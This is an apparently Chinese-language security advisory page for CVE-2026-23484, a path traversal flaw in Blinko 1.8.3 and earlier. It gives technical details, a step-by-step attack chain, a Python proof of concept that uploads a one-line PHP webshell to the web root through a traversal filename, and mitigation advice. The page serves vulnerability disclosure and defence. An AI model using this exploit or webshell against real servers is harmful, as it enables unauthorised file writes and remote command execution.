CVE-2026-23484 CVSS 6.5 中危

CVE-2026-23484 Blinko路径遍历漏洞

披露日期: 2026-03-23

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-23484

漏洞类型

路径遍历

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Blinko

漏洞概述

Blinko 1.8.3及更早版本存在路径遍历漏洞。由于fileName参数未经过滤，攻击者可利用普通用户权限在文件系统任意位置写入文件，严重影响系统完整性。由于发布时暂无公开补丁，攻击者可借此写入Webshell控制服务器，风险较高。

技术细节

该漏洞的根本原因在于Blinko应用程序在处理文件上传相关功能时，未对用户提交的fileName参数进行充分的输入验证和路径过滤。由于缺乏对路径遍历字符（如“../”）的安全检查，攻击者能够构造恶意请求，将文件写入服务器文件系统的任意路径。关键的权限控制缺失使得该漏洞风险加剧：受影响接口仅实施了authProcedure（普通用户认证），而未应用superAdminAuthMiddleware（超级管理员中间件）。这意味着低权限的普通账户即可发起攻击。成功利用此漏洞，攻击者可以在敏感目录写入恶意脚本（如Webshell）或覆盖配置文件，从而可能导致远程代码执行或服务劫持，严重破坏系统完整性。

攻击链分析

STEP 1

信息收集

识别目标系统为Blinko，且版本在1.8.3及以下。

STEP 2

获取凭证

注册或使用一个普通用户账号，获取有效的认证Token。

STEP 3

漏洞利用

构造包含路径遍历字符（如../）的恶意文件名，发送文件写入请求。

STEP 4

写入文件

利用漏洞将恶意文件（如Webshell）写入服务器Web目录或其他敏感位置。

STEP 5

获取权限

访问写入的恶意文件，执行命令以获取服务器控制权。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target configuration
target_url = "http://target.com/api/files"  # Hypothetical endpoint
username = "normal_user"
password = "password"

# 1. Login to get token
login_resp = requests.post("http://target.com/api/login", json={"username": username, "password": password})
token = login_resp.json().get('token')

# 2. Exploit Path Traversal
# The 'fileName' parameter is not filtered
headers = {"Authorization": f"Bearer {token}"}

# Payload: Attempt to write to a sensitive directory using traversal
files = {
    "file": ("../../var/www/html/shell.php", b"<?php system($_GET['cmd']); ?>")
}

data = {
    "other_param": "value"
}

response = requests.post(target_url, headers=headers, files=files, data=data)

if response.status_code == 200:
    print("[+] Exploit successful! File written.")
else:
    print("[-] Exploit failed.")

影响范围

Blinko <= 1.8.3

防御指南

临时缓解措施

建议在WAF或应用网关中添加针对“../”、“..\”等路径遍历字符的过滤规则。同时，严格限制Web服务器的文件写入权限，禁止向Web根目录及系统关键目录写入文件。建议暂时关闭非必要的文件上传功能，并密切监控异常的文件写入行为。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表